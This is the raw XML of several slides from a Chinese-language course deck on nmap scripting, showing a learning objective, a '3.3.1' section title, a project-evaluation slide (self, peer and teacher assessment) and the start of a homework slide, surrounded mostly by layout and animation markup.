            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="2780665"/>
            <a:ext cx="8310245" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="457200"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>识记namp脚本命令，能够设置nmap脚本扫描参数。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>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a:xfrm>
            <a:off x="533756" y="1971129"/>
            <a:ext cx="4302496" cy="521035"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="4302496" cy="521035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7274400" y="1887541"/>
              <a:ext cx="1402080" cy="460375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生自评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="3513239"/>
            <a:ext cx="4302496" cy="524299"/>
            <a:chOff x="6627851" y="3492048"/>
            <a:chExt cx="4302496" cy="524597"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3709766"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3492048"/>
              <a:ext cx="1402080" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生互评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="562331" y="4955527"/>
            <a:ext cx="4302496" cy="525366"/>
            <a:chOff x="6627851" y="5163977"/>
            <a:chExt cx="4302496" cy="525665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形: 圆角 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="5163977"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5382763"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="文本框 576"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5193635"/>
              <a:ext cx="2011680" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>教师综合评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 577"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="5210848"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目评价】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4592955" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>3.3.1 namp脚本介绍</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="9" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="13" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【作业布置】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="649605" y="1952625"/>
            <a:ext cx="6762750" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="742950" indent="-742950" algn="l">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" sz="4000">
